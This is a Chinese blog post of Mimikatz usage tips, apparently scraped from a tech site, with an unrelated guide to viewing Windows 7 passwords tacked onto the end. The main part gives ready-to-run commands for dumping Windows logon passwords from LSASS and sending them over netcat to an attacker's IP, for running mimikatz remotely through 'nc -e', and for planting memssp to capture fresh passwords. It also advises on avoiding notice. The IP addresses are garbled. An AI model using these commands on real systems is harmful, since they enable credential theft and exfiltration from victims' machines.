Mimikatz 使用小技巧

Mimikatz 使用小技巧,第1张

1记录 Mimikatz输出:

C:>mimikatzexe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2将输出导入到本地文件:

C:>mimikatzexe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> logtxt

3将输出传输到远程机器:

Attacker执行:

E:>nc -lvp 4444

Victim执行:

C:>mimikatzexe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | ncexe -vv 192168521 4444

192168521 为Attacker IP

4通过nc远程执行Mimikatz:

Victim执行:

C:>nc -lvp 443

Attacker执行:

E:>ncexe -vv 19216852128 443 -e mimikatzexe

19216852128 为Victim IP

若管理员有每过几天就改密码的习惯,但是 mimikatz 抓取到的密码都是老密码

用QuarksPwDump等抓的hash也是老hash,新密码却抓不到的情况下

可以使用以下方法尝试解决

privilege ::debug

misc::memssp

记录的结果在c:\windows\system32\mimilsalog

每次验证都会记录 如 锁屏 等 重启失效

出现如上问题是因为管理一直没注销过,都是直接断开连接,lsass进程里面还吃存放的老的。

也可以直接logoff,但是这样会很明显。

文件

mimikatz exe 、sekurlsadll、PsExec exe (3389)

本机终端

绝对路径[mimikatz]( >

运行mimikatz

键入命令

第一条:privilege::debug

                //提升权限

第二条:sekurlsa::logonpasswords

              //抓取密码

等待密码结果返回即可

工具:win7系统电脑一台

步骤:

1、打开win7系统电脑,点击开始点击运行。输入“netplwiz”确定。

2、勾选“要使用本机,用户必须输入用户名和密码”,窗口下是本机账户名。

3、点击上方的“高级”,点击管理密码。

4、由于没有设置密码,因此这里没有,如果电脑有设置密码,即可查看到电脑密码。

以上就是关于Mimikatz 使用小技巧全部的内容,包括:Mimikatz 使用小技巧、怎样查看winxp的开机密码,不是破解。、win7如何查看电脑密码只要查看不要删除等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/web/9579318.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-29
下一篇 2023-04-29

发表评论

登录后才能评论

评论列表(0条)

保存